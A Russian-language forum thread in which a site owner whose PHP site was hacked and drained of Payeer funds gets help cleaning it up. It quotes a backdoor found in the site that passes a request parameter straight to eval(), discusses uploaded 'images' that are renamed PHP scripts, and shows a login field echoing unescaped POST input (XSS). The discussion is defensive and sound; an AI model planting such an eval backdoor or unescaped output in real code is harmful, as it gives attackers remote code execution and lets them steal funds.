Взломали GET запросом и вывели деньги Payeer

[Serge_Bliznykov]

Цитата:

Сообщение от Сергей 163

Одна из дыр я так понимаю?

именно это и есть одна из дверей, через которые и можно проникать к вам внутрь.

удаляйте!!!

и вот как это декодируется - ТЫЦ
или тут - ТЫЦ

Цитата:

Код:

<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

[p51x]

Цитата:

Сообщение от Сергей 163

Что скажите на это? Очень много кода base64
Одна из дыр я так понимаю?

А еще там ваш любимый евал... но это как подметание за человеком, который ходить в вымазанных сапогах по вашей квартире.

[Сергей 163]

Есть одна дыра наверное, вообщем пользователи могут загружать аватарку и она естественно идёт на сервер.

[Alar]

Сергей 163, ну и посмотрите в той папке что )) там же по датам изменения файлов всё видно где когда что изменили. самые ранние даты - откуда всё началось )

в настройках сервера должно быть запрещено запускать скрипты в этой папке, htaccess можно настроить, а так для небольшого проекта можно было бы и в базу просто заливать аватарку.

[Сергей 163]

Понято)

Цитата:

Сообщение от Alar

Сергей 163, ну и посмотрите в той папке что )) в настройках сервера должно быть запрещено запускать скрипты в эту папке, htaccess, например можно настроить, а так для небольшого проекта можно было бы и в базу просто заливать аватарку.

Я удалил все содержимое из этой папки,там были png,gif, ну и просто картинки. Могли я думаю через png прописаться(

[Alar]

Цитата:

Сообщение от Сергей 163

через png прописаться

Может я чего не знаю, но как? ))

[p51x]

Цитата:

Сообщение от Alar

Может я чего не знаю, но как? ))

Просто переименованный php-скрипт, а сервер настроен выполнять все из любой папки.

[Alar]

Цитата:

Сообщение от p51x

Просто переименованный php-скрипт

а ну тогда не важно png или jpg. или нет? ) тот же execom меня постоянно этими png картиками пугал, что туда прямо в картинку можно вирус для винды вписать.

[p51x]

если позволено загружать и то, и то тогда пофик

[Сергей 163]

<td align="center" style="padding:3px;"><input name="login" type="text" placeholder="Пользователь (4-10 символов)" size="25" maxlength="10" class="lg" value="<?=(isset($_POST["login"])) ? $_POST["login"] : false; ?>"/></td>
Подскажите ,что не так ругается на- XSS